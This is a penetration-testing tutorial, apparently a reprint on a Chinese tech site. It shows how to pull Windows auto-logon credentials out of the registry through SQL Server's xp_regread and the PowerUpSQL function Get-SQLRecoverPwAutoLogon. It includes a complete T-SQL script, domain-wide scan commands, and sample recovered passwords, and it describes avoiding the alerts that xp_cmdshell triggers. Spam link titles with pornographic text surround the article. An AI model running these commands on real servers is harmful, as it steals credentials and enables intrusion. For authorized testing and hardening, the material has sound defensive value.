精品欧美一区二区三区在线观看 _久久久久国色av免费观看性色_国产精品久久在线观看_亚洲第一综合网站_91精品又粗又猛又爽_小泽玛利亚一区二区免费_91亚洲精品国偷拍自产在线观看 _久久精品视频在线播放_美女精品久久久_欧美日韩国产成人在线

通過SQL Server與PowerUpSQL獲取Windows自動登錄密碼

安全 數據安全
在本文中,我將演示如何使用PowerUpSQL通過SQL Server轉儲Windows自動登錄密碼。 我還將談一下例如xp_regread等其他方式存儲過程在滲透測試中利用方法。

[[184013]]

前言

在本文中,我將演示如何使用PowerUpSQL通過SQL Server轉儲Windows自動登錄密碼。 我還將談一下例如xp_regread等其他方式存儲過程在滲透測試中利用方法。

xp_regread的簡短歷史

自SQL Server 2000以來,xp_regread擴展存儲過程一直存在。自從SQL Server 2000允許Public角色的成員訪問SQL Server服務帳戶中任何有權限的東西。 當時,它有一個非常大的影響,因為常見的SQL Server作為LocalSystem運行。

自從SQL Server 2000 SP4發布以來,xp_regread的影響已經相當小,由于添加了一些訪問控制,防止低特權登錄的用戶去訪問注冊表敏感的位置。 現在,無權限用戶只可訪問與SQL Server相關的注冊表位置。 有關這些的列表,請訪問https://support.microsoft.com/en-us/kb/887165

以下是一些更有趣的訪問路徑:

  1. HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Microsoft SQL Server \  
  2. HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ MSSQLServer  
  3. HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Search  
  4. HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ SQLServer  
  5. HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows消息子系統  
  6. HKEY_LOCAL_MACHINE \ SYSTEM \ CurrentControlSet \ Services \ EventLog \ Application \ SQLServer  
  7. HKEY_LOCAL_MACHINE \ SYSTEM \ CurrentControlSet \ Services \ SNMP \ Parameters \ ExtensionAgents  
  8. HKEY_LOCAL_MACHINE \ SYSTEM \ CurrentControlSet \ Services \ SQLServer  
  9. HKEY_CURRENT_USER \ Software \ Microsoft \ Mail HKEY_CURRENT_USER \ Control Panel \ International 

具有 Public權限的xp_regread的實際用途

xp_regread可以用來獲取很多有用的信息。 事實上,當作為最低權限登錄時,我們可以使用它來獲取無法在通過其他方式而獲得的服務器信息。 例如,PowerUpSQL中的Get-SQLServerInfo函數可以得到一些信息。

  1. PS C:\> Get-SQLServerInfo 
  2. ComputerName           : SQLServer1 
  3. Instance               : SQLServer1 
  4. DomainName             : demo.local 
  5. ServiceName            : MSSQLSERVER 
  6. ServiceAccount         : NT Service\MSSQLSERVER 
  7. AuthenticationMode     : Windows and SQL Server Authentication 
  8. Clustered              : No 
  9. SQLServerVersionNumber : 12.0.4213.0 
  10. SQLServerMajorVersion  : 2014 
  11. SQLServerEdition       : Developer Edition (64-bit) 
  12. SQLServerServicePack   : SP1 
  13. OSArchitecture         : X64 
  14. OsMachineType          : WinNT 
  15. OSVersionName          : Windows 8.1 Pro 
  16. OsVersionNumber        : 6.3 
  17. Currentlogin           : demo\user 
  18. IsSysadmin             : Yes 
  19. ActiveSessions         : 3 

在SQL Server SP4中實現的訪問控制限制不適用于sysadmins。 因此,SQL Server服務帳戶可以在注冊表中訪問的任何內容,sysadmin可以通過xp_regread訪問。

乍一看,這可能不是一個大問題,但它確實允許我們從注冊表中提取敏感數據,而無需啟用xp_cmdshell,當xp_cmdshell啟用和使用時可能會觸發大量警報。

使用xp_regread恢復Windows自動登錄憑據

可以將Windows配置為在計算機啟動時自動登錄。 雖然這不是企業環境中的常見配置,但這是我們在其他環境中經常看到的。 特別是那些支持傳統POS終端和Kiosk與本地運行SQL Server的。 在大多數情況下,當Windows配置為自動登錄時,未加密的憑據存儲在注冊表項中:

  1. HKEY_LOCAL_MACHINE SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon 

利用該信息,我們可以編寫一個基本的TSQL腳本,該腳本使用xp_regread將自動登錄憑據從我們的注冊表中提取出來,而無需啟用xp_cmdshell。 下面是一個TSQL腳本示例,但由于注冊表路徑不在允許的列表中,我們必須將查詢作為sysadmin運行:

  1. ------------------------------------------------------------------------- 
  2. -- Get Windows Auto Login Credentials from the Registry 
  3. ------------------------------------------------------------------------- 
  4. -- Get AutoLogin Default Domain 
  5. DECLARE @AutoLoginDomain  SYSNAME 
  6. EXECUTE master.dbo.xp_regread 
  7. @rootkey        = N'HKEY_LOCAL_MACHINE'
  8. @key            = N'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon'
  9. @value_name     = N'DefaultDomainName'
  10. @value          = @AutoLoginDomain output 
  11. -- Get AutoLogin DefaultUsername 
  12. DECLARE @AutoLoginUser  SYSNAME 
  13. EXECUTE master.dbo.xp_regread 
  14. @rootkey        = N'HKEY_LOCAL_MACHINE'
  15. @key            = N'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon'
  16. @value_name     = N'DefaultUserName'
  17. @value          = @AutoLoginUser output 
  18. -- Get AutoLogin DefaultUsername 
  19. DECLARE @AutoLoginPassword  SYSNAME 
  20. EXECUTE master.dbo.xp_regread 
  21. @rootkey        = N'HKEY_LOCAL_MACHINE'
  22. @key            = N'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon'
  23. @value_name     = N'DefaultPassword'
  24. @value          = @AutoLoginPassword output  
  25. -- Display Results 
  26. SELECT @AutoLoginDomain, @AutoLoginUser, @AutoLoginPassword 

我還創建了一個名為“Get-SQLRecoverPwAutoLogon”的PowerUpSQL函數,所以你可以直接運行它。 它將獲取到默認Windows自動登錄信息和備用Windows自動登錄信息(如果已設置)。 然后它返回相關的域名,用戶名和密碼。

下面是命令示例。

  1. PS C:\> $Accessible = Get-SQLInstanceDomain –Verbose | Get-SQLConnectionTestThreaded –Verbose -Threads 15| Where-Object {$_.Status –eq “Accessible”} 
  2. PS C:\> $Accessible | Get-SQLRecoverPwAutoLogon -Verbose 
  3. VERBOSE: SQLServer1.demo.local\Instance1 : Connection Success. 
  4. VERBOSE: SQLServer2.demo.local\Application : Connection Success. 
  5. VERBOSE: SQLServer2.demo.local\Application : This function requires sysadmin privileges. Done. 
  6. VERBOSE: SQLServer3.demo.local\2014 : Connection Success. 
  7. VERBOSE: SQLServer3.demo.local\2014 : This function requires sysadmin privileges. Done. 
  8. ComputerName : SQLServer1 
  9. Instance     : SQLServer1\Instance1 
  10. Domain       : demo.local 
  11. UserName     : KioskAdmin 
  12. Password     : test 
  13. ComputerName : SQLServer1 
  14. Instance     : SQLServer1\Instance1 
  15. Domain       : demo.local 
  16. UserName     : kioskuser 
  17. Password     : KioskUserPassword! 

結尾

即使xp_regread擴展存儲過程已被部分關閉,不過仍然有很多方法,可以證明在滲透測試期間十分有用。 希望你會與“Get-SQLServerInfo”,“Get-SQLRecoverPwAutoLogon”函數有更多樂趣。

責任編輯:趙寧寧 來源: 安全客
相關推薦

2016-10-09 20:08:58

2010-07-01 11:29:57

SQL Server實

2011-04-06 14:16:49

SQL Server自動備份

2010-07-02 14:52:21

SQL Server元

2016-06-27 09:37:35

2021-07-29 23:21:01

Windows 8Windows微軟

2009-08-13 16:28:07

windows2008密碼驗證

2011-04-22 15:00:22

SQLwin7登錄

2010-11-08 14:32:00

SQL Server登

2010-12-16 11:01:55

Windows Ser

2016-12-22 09:11:24

Windows 10Windows 8Windows 7

2010-07-19 14:24:15

SQL Server盤

2016-10-14 08:45:19

Windows 10隱藏密碼

2009-05-14 13:18:50

SQL Server代理任務微軟

2009-08-25 16:16:27

C#調用Windows

2010-04-27 09:48:09

2010-07-13 09:20:38

SQL Server

2010-07-07 13:58:25

SQL Server死

2010-06-23 09:23:56

SQL Server

2011-04-18 13:02:08

SQL Server SQL Server
點贊
收藏

51CTO技術棧公眾號

久久久美女毛片| 日韩大尺度在线观看| 亚洲欧美在线aaa| 肥熟一91porny丨九色丨| 日韩网红少妇无码视频香港| 另类视频一区二区三区| 亚洲午夜精品在线| 日韩精品欧美在线| 精品国产无码AV| 久久久久99| 久久91超碰青草是什么| 国产福利精品av综合导导航| 成人午夜影院在线观看| 天天综合网入口| 欧美黄色录像片| 日韩av在线免费观看| 三级在线免费观看| 你懂的视频在线播放| 国内久久精品视频| 国产精品96久久久久久| 日韩av男人天堂| 91av精品| 亚洲一区二区久久久| 69xxx免费视频| 日本精品久久| 91久久精品一区二区三区| 成人午夜免费在线视频| 99精品老司机免费视频| 2014亚洲片线观看视频免费| 99re在线国产| 一起草av在线| 日韩精品免费专区| 91精品国产成人www| 国产又黄又爽又无遮挡| 欧美1级片网站| 亚洲成人a级片| 国产欧美日本一区二区三区| 99re在线国产| 国产人妖在线播放| 蜜臀久久99精品久久久久久9| 夜夜嗨av一区二区三区四区| a级一a一级在线观看| 欧美日本三级| 欧美理论电影在线| 婷婷六月天在线| 玛雅亚洲电影| 色综合久久六月婷婷中文字幕| 亚洲v国产v在线观看| 国产伦理吴梦梦伦理| 狠狠综合久久av一区二区老牛| 亚洲精品一区久久久久久| 国产乱淫av麻豆国产免费| 国产成人免费av一区二区午夜| 亚洲午夜一区二区三区| 亚洲区成人777777精品| 日本免费在线观看| www.亚洲精品| 国产在线一区二| 成人黄色片免费| 国产精品久久无码| 第四色在线一区二区| 日韩欧美一级在线播放| 一级黄色免费毛片| 欧美日韩精品免费观看视欧美高清免费大片| 国产精品每日更新| 国产中文一区二区| 午夜激情小视频| 国产麻豆一精品一av一免费 | 真人bbbbbbbbb毛片| 国产精品17p| 亚洲福利在线看| 草草地址线路①屁屁影院成人| 亚洲精品三区| 在线免费观看视频一区| 99视频在线免费| 高清在线视频不卡| 一区二区三区在线观看视频| 日韩不卡av| 欧美成人精品一区二区男人看| av福利精品导航| 久久精品日韩| 国产二区在线播放| xf在线a精品一区二区视频网站| 成人中文字幕在线观看| 亚洲天堂五月天| 精品一区二区三区免费| 国产69精品久久久久9999apgf| 国产一区二区波多野结衣| 国产一区二区调教| 国产日韩精品一区观看| 美女欧美视频在线观看免费 | 霍思燕三级露全乳照| www欧美xxxx| 欧美日韩中文在线观看| 午夜精品久久久久久久99热影院| 美女福利一区二区| 精品久久久久久久久久久久久久| 国产小视频免费| 亚洲黄色免费看| 欧美精品在线观看一区二区| av漫画在线观看| 国产日韩视频在线| 欧美成人全部免费| 青娱乐在线视频免费观看| 亚洲理伦在线| 国产欧美日韩中文字幕在线| www.激情五月.com| 国产日产精品1区| 日本成人性视频| 英国三级经典在线观看| 欧美一级免费大片| 少妇性l交大片7724com| 亚洲精品国产setv| 裸体女人亚洲精品一区| 狠狠人妻久久久久久| 国模娜娜一区二区三区| 久久综合给合久久狠狠色| 亚州av在线播放| 自拍偷拍亚洲欧美日韩| 国产日韩一区二区在线观看| 免费成人美女女| 欧美成人精品福利| 99在线视频免费| 91精品国产视频| 日本高清不卡在线| 高清毛片aaaaaaaaa片| 亚洲国产精品成人综合色在线婷婷| 涩涩涩999| 看黄在线观看| 在线亚洲人成电影网站色www| 午夜宅男在线视频| 精品国产亚洲一区二区三区在线| 日韩精品在线一区二区| 一级二级黄色片| 欧美涩涩视频| 成人精品福利视频| av在线1区2区| 精品国产鲁一鲁****| 1区2区3区国产精品| avav在线播放| 国产视频网站一区二区三区| 国产亚洲综合久久| 国产成人在线免费视频 | 中文字幕不卡在线视频极品| 亚洲欧美在线观看视频| 国产v综合v亚洲欧| 日韩国产精品一区二区三区| 黄在线观看免费网站ktv| 精品成人一区二区三区四区| 99热精品免费| 韩国精品在线观看| 伊人婷婷久久| 婷婷久久综合九色综合99蜜桃| 精品欧美一区二区久久| 男女性高潮免费网站| 国产麻豆视频一区二区| 潘金莲一级淫片aaaaaa播放1| www.com.cn成人| 国产午夜精品久久久| 乱h高h女3p含苞待放| 久久 天天综合| 好吊色这里只有精品| 中文成人激情娱乐网| 久久精品免费电影| 国产超碰人人模人人爽人人添| 91年精品国产| 红桃av在线播放| 九九视频精品全部免费播放| 国产精品大片wwwwww| 日本加勒比一区| 五月天国产精品| 免费黄色在线视频| 日韩—二三区免费观看av| 亚洲国产精品久久久久婷婷老年| 天堂网在线最新版www中文网| 欧美一区二区三区在线| 九九在线观看视频| av资源站一区| 三级在线视频观看| 亚洲国产精品91| 精品一卡二卡三卡四卡日本乱码 | 日韩 欧美 自拍| 欧美成年网站| 国产精品中文字幕一区二区三区| 九九久久久久99精品| 亚洲高清精品视频| 精品久久久在线观看| 免费看裸体网站| 国产在线精品一区二区夜色 | 日韩一区二区三区高清在线观看| 这里只有精品在线播放| 制服.丝袜.亚洲.中文.综合懂色| 丁香六月综合激情| 岳毛多又紧做起爽| 久久香蕉国产| 黄色99视频| 欧洲亚洲精品久久久久| 久久久久亚洲精品国产 | 91精品视频网| 国产大片中文字幕在线观看| 国产日韩精品一区| 国产伦理在线观看| 欧美精品导航| 日本福利一区二区三区| 亚洲国产精品免费视频| 欧美美女18p| 飘雪影视在线观看免费观看| 欧美电影影音先锋| 亚洲高清毛片一区二区| 自拍偷拍国产亚洲| a级片在线观看| 国产久卡久卡久卡久卡视频精品| 中文字幕色呦呦| 国产99久久精品一区二区300| 国产成人精品免高潮在线观看| 青青草免费在线视频| 91麻豆精品国产自产在线观看一区| 日韩欧美国产成人精品免费| 久久久亚洲欧洲日产国码αv| 少妇激情一区二区三区| 欧美日韩天堂| 亚洲一区二区三区午夜| 三级精品视频| 国产99在线免费| 韩日毛片在线观看| 久久av中文字幕| 69久久久久| 亚洲午夜久久久影院| 午夜激情小视频| 精品国产一区二区在线观看| 成年人视频在线免费看| 一区二区高清视频在线观看| 青青操在线播放| 久久婷婷国产综合精品青草| 99精品一区二区三区无码吞精 | 成人一级片免费看| 国产专区欧美精品| 亚洲视频在线a| 免费国产自线拍一欧美视频| 成人国产在线看| 奇米亚洲欧美| 精品在线视频一区二区| 久久a级毛片毛片免费观看| 亚洲一区二区三区乱码aⅴ| 国产伦理精品| 国内自拍欧美激情| 在线视频二区| 在线观看视频99| 在线视频1区2区| 日韩视频中文字幕| 毛片在线视频| 精品精品国产国产自在线| 日韩子在线观看| 久久亚洲电影天堂| a级影片在线| 欧美麻豆久久久久久中文| 污片在线免费观看| 色综合久久久888| 国产二区在线播放| 亚洲电影免费观看| 一级特黄录像免费看| 6080国产精品一区二区| 国产免费一级视频| 欧美综合视频在线观看| 中文字幕乱码在线观看| 欧美日韩美少妇| 国产免费高清av| 日韩欧美久久一区| 婷婷色在线视频| 亚洲人成电影网站| 三区四区在线视频| 欧美国产精品人人做人人爱| sm捆绑调教国产免费网站在线观看 | 国产厕拍一区| 亚洲一区二区免费在线| 高潮按摩久久久久久av免费| 精品国产第一页| 欧美精品一区二区三区中文字幕| 麻豆传媒一区| 欧州一区二区| 台湾无码一区二区| 一区二区激情| 777视频在线| 国产成人午夜视频| 右手影院亚洲欧美| 国产精品毛片久久久久久久| 欧美人与禽zozzo禽性配| 欧美日韩性生活视频| 中文字幕视频二区| 精品国产123| 波多野结衣爱爱视频| 在线视频观看日韩| av电影一区二区三区| 93在线视频精品免费观看| 无遮挡亚洲一区| 亚洲乱码精品| 欧美一级在线看| 久久99精品一区二区三区三区| 污色网站在线观看| 久久97超碰国产精品超碰| 欲求不满的岳中文字幕| 国产精品青草久久| 麻豆久久久久久久久久| 在线电影院国产精品| 午夜成人鲁丝片午夜精品| 久久色免费在线视频| 免费电影日韩网站| 国产精品国产三级国产aⅴ浪潮| 激情开心成人网| 成人av免费在线看| 日韩一区二区中文| 男女高潮又爽又黄又无遮挡| 久久99蜜桃精品| 蜜桃精品一区二区| 亚洲资源中文字幕| 91久久国语露脸精品国产高跟| 在线播放中文一区| 亚洲第一页综合| 久久精品人人做人人爽| 激情开心成人网| 久久伦理网站| 欧美hd在线| 国产成人久久777777| 成人av在线电影| 亚洲图片另类小说| 午夜精品视频一区| 无码人妻精品一区二区| 欧美久久免费观看| 精品视频二区| 97色在线视频观看| 激情小说一区| 欧美高清中文字幕| 国产精品一区二区久久精品爱涩| 亚洲一区二区在线免费| 亚洲精品videosex极品| 波多野结衣视频网站| 亚洲国产精品美女| 欧美寡妇性猛交xxx免费| 91免费欧美精品| 四季av在线一区二区三区 | 天堂v在线观看| 欧美福利视频在线| 久久久久久久久久久久电影| 一区二区在线观看网站| 另类调教123区| 国产一二三av| 欧美日韩不卡一区二区| 91精品专区| 97超级碰碰碰久久久| 极品一区美女高清| 国产日韩欧美精品在线观看| 成人深夜福利app| 日韩激情一区二区三区| 亚洲国产高清福利视频| 久热在线观看视频| 农村寡妇一区二区三区| 日韩av电影天堂| 一级二级黄色片| 欧美精品99久久久**| av在线看片| 国产精品一区二区三区免费| 亚洲乱码久久| 日韩一级av毛片| 欧美日韩你懂的| 黄页视频在线播放| 高清视频一区| 久久亚洲综合| 亚洲精品自拍视频在线观看| 91精品国产综合久久福利| 2021国产在线| 久久久久久九九九九| 日韩国产在线一| 97在线观看视频免费| 日韩免费性生活视频播放| 日韩脚交footjobhd| 日本视频一区二区在线观看| 久久精品国产精品青草| 免费网站看av| 亚洲欧美另类在线观看| 成人四虎影院| 天堂精品视频| 国产精品夜夜嗨| 国产五月天婷婷| 亚洲深夜福利网站| 中文成人激情娱乐网| 久久综合色视频| 国产精品免费aⅴ片在线观看| 男人天堂2024| 久久在线精品视频| 欧美综合精品| 五月天开心婷婷| 天天操天天综合网| 国产激情视频在线观看| 九色综合婷婷综合| 国内不卡的二区三区中文字幕 | 天天操天天干天天| 国产精品一区二区久久国产| 亚洲美女视频在线免费观看| 美国精品一区二区| 亚洲国产一区二区三区四区|